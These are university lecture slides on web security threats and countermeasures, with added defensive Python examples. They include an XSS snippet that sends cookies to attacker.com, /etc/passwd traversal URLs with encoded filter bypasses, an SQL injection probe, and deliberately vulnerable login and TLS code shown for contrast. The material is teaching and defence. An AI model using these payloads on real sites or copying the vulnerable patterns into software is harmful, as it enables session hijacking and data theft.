
Internet Security

CS 312 - Internet Concepts


Old Dominion University

Many of these slides created by Dr. Ralph Grove, Dr. Michele C. Weigle
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

2
What's Wrong with the Web?
Crime
• 2019: 467,361 complaints with losses > $3.5 B in the US
• Top crimes: phishing, non-payment/delivery, extortion, data breach
• CSIS estimates $600 B in losses globally each year

FBI, 2019 Internet Crime Report, https://pdf.ic3.gov/2019_IC3Report.pdf
Center for Strategic and International Studies (CSIS), Economic Impact of Cybercrime, 2018, https://www.csis.org/analysis/economic-impact-cybercrime
3
Desirable Security Characteristics
C - I - A triad
• Confidentiality
  • privacy of information
• Integrity
  • protection of information against change
• Availability
  • provision of service as needed
• Authentication
  • reliable identification of all parties
• Authorization
  • restriction of privileges / abilities
• Accountability
  • non-repudiation of individual actions
4
Security Terminology
• Threat: A future event that is possible (indefinite) and harmful
  • Ex: Someone steals your password and sends malicious email messages
• Attack: An actual incident that is intended to cause harm
  • may be successful or not
  • an attacker initiates the incident, a victim is harmed
• Vulnerability: A system flaw that enables an attack to succeed
  • may be related to software, hardware, personnel, or procedures
• Counter-measure: A method to defeat an attack
  • may be in software, hardware, procedures, training, etc.
5
Threat Example
• Threat: Theft of userids and passwords from an online system
• Attack: Attacker uses a brute-force password attack on the root database server and steals DB backup files
• Vulnerability: Weak system security
• Counter-Measure: Use strong passwords; Strengthen firewall and intrusion detection system
6
Threat Model
• A comprehensive list of reasonably likely threats
• What's reasonably likely depends on the value of the asset
  • e.g., military databases are subject to attack by trained cyber-spies; my email account, OTOH, might be attacked by low-order criminals
• Threat Model may include
  • Skills and resources of attacker
  • Objective of attacker
  • Method of attack, potential vulnerabilities
  • Harm that could result from the attack
7
Threat Model Example
• A threat model for an office computer
• Attacker walks in and steals confidential information
• Attacker walks in and plants malware on the computer
• A remote attacker plants ransomware on the system
• A thief steals the physical computer
• ...etc.

8
Threat Model Uses
1. Guide software design
   Helps designers to assess the required degree of security
2. Guide testing
   Helps testers to know what vulnerabilities to look for
3. Set standards for monitoring
   Helps sysadmins to know what sorts of attacks to watch for when the system is operational
9
Think, Discuss, Explain
• Consider the Canvas learning system
• What threats are reasonable? Consider the attacker's
  • Motive - why?
  • Means - how?
  • Skill set

10
Buffer
• Buffer: An area in memory where data is held for processing
[Diagram: data source → input buffer → Processor → output buffer → data consumer]
12
Buffer Overflow Threat
• Threat: Buffer Overflow
• Vulnerability: An unchecked input buffer
• Attack: Attacker enters a long input string that overruns the available buffer space, thereby overwriting executable code or configuration
13
Buffer Overflow Countermeasures
• For programmers:
  • Use a string-safe language (e.g., Java, C#)
  • Check the length of every input (C, C++)
• For sysadmins:
  • Update all system components (OS, DBMS, etc.) regularly, so that recent patches are applied immediately

14
Think, Discuss, Explain*
• What indicates that this might be a buffer overflow attack?

http://www.myapp.com/login?x7afkmvkf85l9keiw7cjaldkfjai4qlmchjsd62jakifui434a090998afdafhq4j4jalja88sjsdjfhkjhmca83k11jajhk

• long parameter name
• no parameter value

15
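The two indicators on the slide (a very long parameter name, and no value for it) can be turned into a log check. The following is an added example, not code from the slides: it parses the query string of each request target and flags parameters whose name or value is far longer than any legitimate parameter the application uses. The thresholds, the placeholder origin and the sample log lines are all constructed for the example.

```python
from urllib.parse import urlsplit, parse_qsl

# Thresholds are assumptions for this example; tune them to the parameter
# names and value sizes the real application actually uses.
MAX_NAME_LEN = 32
MAX_VALUE_LEN = 1024


def suspicious_params(url, max_name=MAX_NAME_LEN, max_value=MAX_VALUE_LEN):
    """Return (parameter, reason) pairs for query parameters that look like
    an attempt to overrun an input buffer: a very long parameter name, a
    long name with no value at all, or a very long value."""
    findings = []
    query = urlsplit(url).query
    # keep_blank_values=True so a bare "?xxxx" (name, no '=') is still seen
    for name, value in parse_qsl(query, keep_blank_values=True):
        label = name if len(name) <= 16 else name[:16] + "..."
        if len(name) > max_name and value == "":
            findings.append((label, "long parameter name with no value"))
        elif len(name) > max_name:
            findings.append((label, "parameter name too long"))
        elif len(value) > max_value:
            findings.append((label, "parameter value too long"))
    return findings


# Constructed access-log lines (not from the original slides); the second
# one mirrors the pattern shown on the slide.
SAMPLE_LOG = [
    "GET /login?user=alice&next=%2Fhome HTTP/1.1",
    "GET /login?x7afkmvkf85l9keiw7cjaldkfjai4qlmchjsd62jakifui434a090998afdafhq4j HTTP/1.1",
    "GET /search?q=" + "A" * 3000 + " HTTP/1.1",
]


def scan_log(lines):
    """Apply suspicious_params to the request target of each log line and
    return the targets that triggered a finding, with their reasons."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        # urlsplit wants a full URL, so prefix a dummy origin to the target
        findings = suspicious_params("http://placeholder.invalid" + parts[1])
        if findings:
            hits.append((parts[1][:40], findings))
    return hits


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, reasons)
```

Only the second and third constructed lines are reported; the first, with a normal user and a short path value, passes. In production the same check belongs in a WAF rule or the application's own input validation, not only in after-the-fact log review.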
Cross-Site Scripting (XSS) Threat
• Threat: Attacker hijacks victim's session
• Vulnerability: Unfiltered input stream
• Attack:
  1. Attacker posts malicious HTML+JavaScript on a forum
  2. Victim views (downloads) malicious code on forum, and clicks an included link
  3. Victim's session cookie is transmitted to Attacker
  4. Attacker obtains Victim's sessionId, and hijacks Victim's session
[Diagram: Attacker → (1) Forum → (2) Victim → (3) Attacker's Server → (4) Attacker]
17
XSS Attack

http://www.acunetix.com/blog/articles/persistent-cross-site-scripting/

18
XSS Attack
• Malicious Code:
<div id="div1"></div>
<script>
// builds a link whose query string carries the victim's cookies
var p = '<p><a href="http://attacker.com?cookie='
      + document.cookie + '">Click here!</a></p>';
document.getElementById('div1').innerHTML = p;
</script>

• Hyperlink:
Click here!
actually goes to http://attacker.com/?cookie=PHPSESSID=388PKQ838...

19
XSS Countermeasures
1. Filter all input
  • reject input containing HTML or JavaScript, or
  • change delimiters to HTML entity codes upon input: < becomes &lt;, > becomes &gt;, etc.
    <a href="..."> becomes &lt;a href="..."&gt; - displayed, not executed
2. Use built-in language safety features, e.g.,
    $input = htmlspecialchars($input); // convert delimiters to HTML entities
    < becomes &lt; etc.
3. Mark cookies as "HttpOnly", i.e., not readable by JavaScript
20
Think, Discuss, Explain*
1. What does marking a cookie as "HttpOnly" accomplish?

2. What does an effective XSS attack gain for the attacker?

3. How is the victim harmed in an XSS attack?

21
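The three countermeasures and the first discussion question can be shown together. This is an added example, not the slides' own code: Python's html.escape stands in for PHP's htmlspecialchars (countermeasures 1 and 2), and http.cookies builds the Set-Cookie header with the HttpOnly flag (countermeasure 3). The forum post is constructed for the example and is modelled on the malicious snippet above.

```python
import html
from http.cookies import SimpleCookie

# Constructed forum post, modelled on the slide's malicious snippet
# (example input, not the original page's code).
UNTRUSTED_POST = (
    '<div id="div1"></div><script>var p = \'<a href="http://attacker.example'
    '?cookie=\' + document.cookie + \'">Click here!</a>\';'
    'document.getElementById("div1").innerHTML = p;</script>'
)


def render_post(untrusted_text):
    """Countermeasures 1 and 2: convert the delimiters to entity codes so the
    browser displays the post as text instead of executing it. quote=True
    also escapes ' and ", which matters inside attribute values."""
    return "<p>" + html.escape(untrusted_text, quote=True) + "</p>"


def contains_active_content(rendered_html):
    """Sanity check on the output: no raw <script> or <a> tag may survive."""
    lowered = rendered_html.lower()
    return "<script" in lowered or "<a " in lowered


def session_cookie_header(session_id, secure=True):
    """Countermeasure 3: mark the session cookie HttpOnly so document.cookie
    cannot read it even if a script does run. Secure keeps the cookie off
    plain HTTP, which also blunts the sniffing threat discussed later."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = secure
    cookie["PHPSESSID"]["path"] = "/"
    return cookie["PHPSESSID"].OutputString()


if __name__ == "__main__":
    print(render_post(UNTRUSTED_POST))
    print("Set-Cookie:", session_cookie_header("388PKQ838"))
```

Escaping on output is what actually neutralises the stored script; the HttpOnly flag is defence in depth, because it protects the session even when an escaping bug slips through. Answering question 1 on the slide: the script can still run, but document.cookie no longer contains the session id, so step 3 of the attack has nothing to send.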
How common are internet attacks?
Live Threat Maps:
• https://livethreatmap.radware.com/
• https://threatmap.checkpoint.com/
• https://attackmap.sonicwall.com/live-attack-map/
• https://cybermap.kaspersky.com/

Reference website: https://norse-corp.com/map/

22
Are Cyber attacks limited to personal/theft?
• No, concerns are real and myriad, generally fall into cyberwarfare and cyber-terrorism categories
• References:
  https://www.fortinet.com/resources/cyberglossary/most-notorious-attacks-in-the-history-of-cyber-warfare
  https://www.csis.org/programs/strategic-technologies-program/significant-cyber-incidents

24
Hypothesis: the most serious acts of cyber terrorism are kept secret. Why?
• Cyber Warfare in the Ukraine?
  https://www.reuters.com/world/europe/factbox-the-cyber-war-between-ukraine-russia-2022-05-10/
• Digital interdiction
• Propaganda and information blackouts
• Remote control vehicles: air and sea based drones

25
Insider Misuse Threat
• Threat Models typically anticipate external attacks
• Much IT crime is perpetrated by company insiders (employees)
[Diagram: external Attacker blocked by the Firewall; Insider already inside the Firewall, next to the Server]

26
Insider Misuse Threat
• Threat: An insider (employee) gains unauthorized access to facilities, and steals or manipulates data
• Vulnerability: Lack of internal security, lack of awareness
• Attack: Attacker (insider) logs into server and manipulates data or software
• Countermeasure: Establish a DMZ* to isolate operation facilities

* demilitarized zone
27
Insider Misuse Countermeasure
• Insiders are blocked from operations servers (except privileged sysadmins)
[Diagram: DMZ between two Firewalls; Attacker and Insider on the outside, Ops Server and Dev Server on the inside]

28
Think, Discuss, Explain*
1. Why is insider misuse often overlooked in security plans?

2. What is a DMZ and how does it block insider threats?

29
Sniffing Threat
• Threat: Attacker steals confidential information
• Vulnerability: Unsecured communication channel
• Attack: Attacker monitors plain-text network traffic, and searches for valuable confidential information (e.g., credit card info)
31
Sniffing Countermeasure
1. Use HTTPS/TLS to encrypt messages
2. Use a VPN (virtual private network) to create a secure tunnel between client and server
[Diagram: Client → VPN Tunnel across the Network → VPN Server → Server]

32
Spoofing Threat
• Threat: Attacker steals users' login credentials via a false website
• Vulnerability: Lack of site security, user gullibility, carelessness
• Attack: Attacker creates a false website, identical to the real one, and presents the fake URL to victims, who use it to attempt a login. Attacker steals credentials, and can then login to the real site.
34
What's wrong with this website?

35
Spoofing Countermeasures
1. User education – never click email links
2. Make URLs simple (e.g., www.odu.edu) so that they can be entered quickly and easily
3. Use challenge-response interactions, two-channel authentication
4. Use HTTPS, which helps to authenticate the server
36
Database Vulnerabilities
• Much of the data held in web servers is stored in databases
• accessed through SQL commands

• Common commands
• CREATE TABLE – creates a new database table
• ALTER TABLE – changes the contents of the table
• INSERT INTO – insert a record into a table
• SELECT * FROM – return data from the table matching some query
• DROP TABLE – delete the table
SQL Injection
• Web forms that are used as input to SQL database queries are susceptible to SQL injection attacks
• How can you prevent these types of attacks?
  • properly validating input
  • preventing data from web forms from directly modifying SQL statements

39
SQL Injection

https://xkcd.com/327/

40
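The two prevention points on the SQL Injection slide, shown side by side in working code. This is an added example, not from the slides: a login query built by string concatenation next to the parameterized form, plus a whitelist validator for the username field. The in-memory sqlite3 table, the user records and the username policy (letters, digits and underscore) are constructed assumptions for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for a site's user database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "battery-staple")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Form values spliced straight into the statement text: a quote in the
    input closes the literal early and the rest of the input becomes SQL,
    so the WHERE clause the developer wrote is no longer the one that runs."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Parameterized query: the statement is fixed and the driver passes the
    values separately, so input can never change the statement's structure.
    Any quote in the input is just a character inside the compared value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def validate_username(username):
    """Input validation as a second layer: accept only the characters a
    username is allowed to contain (assumed policy: letters, digits, '_')."""
    return username.isascii() and username.replace("_", "").isalnum()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "alice", probe))
    print("safe:      ", login_safe(db, "alice", probe))
    print("valid name:", validate_username("alice"), validate_username(probe))
```

With the classic probe as the password, the concatenated query returns every user because the condition it ends up evaluating is always true, while the parameterized query returns nothing because no stored password equals that string. Validation is worth keeping for fields with a narrow legal format, but parameterization is what removes the vulnerability; validation alone is easy to get wrong for free-text fields.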
URL Manipulation Attack
• URL components: scheme:domain:port:resource
  e.g., http://www.cs.odu.edu:80/~rgrove/cs312
• The resource is typically associated with a directory
  e.g., /home/rgrove/secure_html/cs312
• The directory is part of a file structure:
  /
  -home
    -rgrove
      -secure_html
        -cs312
42
URL Manipulation Attack
• Threat: Attacker gains access to confidential information
• Vulnerability: Unprotected server system resources (excess privilege)
• Attack: Attacker manipulates URL to traverse file system
  http://www.cs.odu.edu/~rgrove/../../../etc/passwd
  http://www.cs.odu.edu/~rgrove/..%2F..%2F..%2Fetc%2Fpasswd
  *slashes replaced with escape characters to get past input filters
  /
  -home
    -rgrove
      -secure_html
  -etc
    -passwd

43
URL Manipulation Countermeasures
1. Filter input to remove '/' and equivalent codes (or '\' for Win)
2. Properly protect all directories & files (least privilege)
3. Disallow browsing of root directories
4. Disallow browsing of directories not containing an index file

44
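Countermeasure 1 is stronger when the server decodes the URL first and then checks where the resulting path lands, rather than searching the raw string for '/'. The following is an added example, not code from the slides: it percent-decodes the request path (repeatedly, so the %2F trick and a double-encoded %252F are both caught), resolves it against the document root and refuses anything that ends up outside it. The document root and the request paths are constructed for the example; the traversal strings are the ones on the slide.

```python
from pathlib import Path
from urllib.parse import unquote


class ForbiddenPath(Exception):
    """Raised for a request that would leave the document root."""


def resolve_request(doc_root, url_path, max_decode_rounds=2):
    """Map a URL path onto the filesystem and refuse anything that escapes
    doc_root. Decoding happens before the check so "%2F" and even a
    double-encoded "%252F" are judged by what they turn into, not by
    what the raw string looks like."""
    decoded = url_path
    for _ in range(max_decode_rounds):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    # Null bytes truncate paths in C-based servers; backslashes are
    # separators on Windows (countermeasure 1's '\' case).
    if "\x00" in decoded or "\\" in decoded:
        raise ForbiddenPath("null byte or backslash in path: %r" % url_path)
    root = Path(doc_root).resolve()
    # resolve() collapses every "..", so the comparison below is on the
    # real target, not on the text of the request
    candidate = (root / decoded.lstrip("/")).resolve()
    if candidate != root and root not in candidate.parents:
        raise ForbiddenPath("path escapes document root: %r" % url_path)
    return candidate


def check_request(doc_root, url_path):
    """Convenience wrapper: True if the request maps inside doc_root."""
    try:
        resolve_request(doc_root, url_path)
        return True
    except ForbiddenPath:
        return False


if __name__ == "__main__":
    # Constructed document root; it need not exist for the check to work.
    ROOT = "/srv/www/secure_html"
    for req in ("/cs312/index.html",
                "/~rgrove/../../../etc/passwd",
                "/~rgrove/..%2F..%2F..%2Fetc%2Fpasswd",
                "/~rgrove/..%252F..%252F..%252Fetc%252Fpasswd"):
        print(req, "->", "allowed" if check_request(ROOT, req) else "refused")
```

The check is the least-privilege point of countermeasure 2 applied at the application layer: whatever the filesystem permissions say, the web server only ever serves files under its own root. Running the server as an unprivileged account that cannot read /etc/passwd-style files in the first place is the matching OS-level control.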
Phishing
• Phishing attacks are used to obtain sensitive personal information, such as social security numbers, credit card numbers, passwords, by masquerading as a legitimate website or email.
https://it.sheridancollege.ca/selfhelp/security/images/phishing-samples/amazon-phish.jpg
• Often phishing emails and websites have misspellings or grammatical errors that give them away
• Some are quite sophisticated and realistically copy the look and feel of a legitimate website.
46
Phishing Threat
• Threat: Attacker motivates victim to divulge confidential information
• Vulnerability: Victim is gullible, unaware; System lacks user protection
• Attack: Attacker sends victim an urgent message, requesting victim to take some action, often via a fraudulent website, that divulges confidential information (e.g., login credentials)

47
Phishing
Example
[Screenshot of a phishing email: it appears to come from your boss, and its link actually goes to www.attacker.com]

48
Phishing

http://face-book-tips.blogspot.com/2011/06/phishing-scam-alert-comment-spam-leads.html

49
Phishing Countermeasures
1. Train employees continuously
  • do not click links in email or other messages
  • confirm unusual, suspicious requests
  • require two parties for all financial transactions
2. Use email filters to block spam and to remove suspicious links

50
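One concrete filter rule behind countermeasure 2 is the pattern in the earlier phishing example: a link whose visible text looks like one site while its href goes somewhere else. This is an added example, not from the slides: it pulls every anchor out of an HTML message with the standard-library parser and flags links that point outside a trusted domain set or whose displayed text names a different domain than the target. The sample email, the trusted set and the two-label domain comparison are constructed assumptions (a real filter would use a public-suffix list).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in an HTML email."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


# Visible text that itself looks like a URL or bare domain name.
DOMAIN_LIKE = re.compile(
    r"^(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:[/?#].*)?$")


def registrable(host):
    """Crude last-two-labels comparison; assumption: no public-suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def suspicious_links(html_body, trusted_domains):
    """Flag links to domains outside the trusted set, and links whose
    visible text names a domain other than the one the href points to."""
    parser = LinkCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        host = urlsplit(href).hostname or ""
        if registrable(host) not in trusted_domains:
            findings.append((href, "link to untrusted domain"))
        shown = DOMAIN_LIKE.match(text)
        if shown and registrable(shown.group(1)) != registrable(host):
            findings.append((href, "visible text %r does not match target" % text))
    return findings


# Constructed phishing message (not a real email); the first link shows
# the university's domain but leads elsewhere.
SAMPLE_EMAIL = """
<p>URGENT: your mailbox is over quota. Verify your account today.</p>
<p><a href="http://login-odu.attacker.example/verify">www.odu.edu</a></p>
<p><a href="https://www.odu.edu/help">Click here</a> for the help desk.</p>
"""
TRUSTED = {"odu.edu"}

if __name__ == "__main__":
    for href, reason in suspicious_links(SAMPLE_EMAIL, TRUSTED):
        print(reason, "->", href)
```

A mail gateway would act on the findings by rewriting or removing the flagged anchors before delivery, and a training programme can use the same two signals (unexpected domain, text/target mismatch) as the things to teach people to hover for.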
Spear Phishing
• Phishing attacks targeted at high-level people
• April 2011, Oak Ridge National Laboratory (ORNL)
  • email sent from "Human Resources Department"
  • directed users to login to HR account to ensure that benefits are available
  • targeted only 530 employees
  • 57 people clicked on the link
  • 2 with unprotected computers
  • hackers gained access to ORNL servers and data
51
Think, Discuss, Explain*
• What phishing emails have you received at ODU?
• What is tunnel-vision, and how does it work to the attacker's advantage in the case of phishing?

52
Transport Layer Security (TLS)
• Originally Secure Sockets Layer (SSL)
  • SSL developed by Netscape, 1995
  • Replaced by TLS, 1999
• Added Value:
  • Server / Client authentication
  • Message Encryption

54
TLS Server Authentication
• Servers are authenticated by Certificates
[Diagram: Client, Server and Certificate Authority]
  1. Certificate Authority issues a signed certificate
  2. Server sends certificate to client via TLS
  3. Client verifies server's certificate with CA
55
TLS Server Authentication
• Web browsers ship with predefined CA certificates, to establish initial trust
• Clients can also authenticate to server, but certificates are expensive
[Diagram, as on the previous slide: 1. Certificate Authority issues a signed certificate; 2. Server sends certificate to client via TLS; 3. Client verifies server's certificate with CA. Step 3 requires an initial trust link between client and CA]
56
TLS Handshake
• The Client and Server start by sharing information and negotiating an encryption key for the session
• The client can also provide a certificate, but usually it's just the server
[Diagram: Client ↔ Server message sequence: hello, certificate, key negotiation]
57
TLS Encryption
• Each message is encrypted / decrypted
• A complete HTTP transaction requires four encryption/decryption operations
[Diagram: Client encrypts the request, Server decrypts it; Server encrypts the response, Client decrypts it]

58
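The server-authentication slides describe what a client must do with the certificate it receives in the handshake: check that it chains to a CA the client already trusts and that it names the server being contacted. The following is an added example, not from the slides, showing that check as a client-side configuration in Python's ssl module, with the weak setting beside the correct one. It builds the contexts only; opening a real connection is left to the usage note. The TLS 1.2 floor is this example's choice, not something the slides state.

```python
import ssl


def insecure_context():
    """The weak setting: certificate verification switched off. The
    handshake still negotiates a key and encrypts traffic, but the client
    never learns who holds the other end of the tunnel, so anyone on the
    path can present a certificate of their own and sniff or alter data."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def verifying_context():
    """The correct setting: trust the platform's bundled CA certificates
    (the browser-style initial trust link to the CA) and require the
    server's certificate to chain to one of them and to match the hostname
    the client asked for (step 3 of the slide's diagram)."""
    ctx = ssl.create_default_context()           # loads the system CA store
    # these are the defaults; restated so the intent is explicit
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    # SSL 3 and TLS 1.0/1.1 are retired; TLS 1.2 floor is this example's choice
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def describe(ctx):
    """Summarise the three settings a reviewer should look for."""
    return {
        "verifies_chain": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": bool(ctx.check_hostname),
        "min_version": ctx.minimum_version.name,
    }


if __name__ == "__main__":
    print("weak:   ", describe(insecure_context()))
    print("correct:", describe(verifying_context()))
```

To use the verifying context, wrap a connected socket with ctx.wrap_socket(sock, server_hostname="www.odu.edu"); the server_hostname argument is what check_hostname compares the certificate against, and a mismatch or an unknown CA raises ssl.SSLCertVerificationError before any application data is sent. Code that sets CERT_NONE "to make the connection work" has disabled exactly the server authentication the slides list as TLS's added value.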
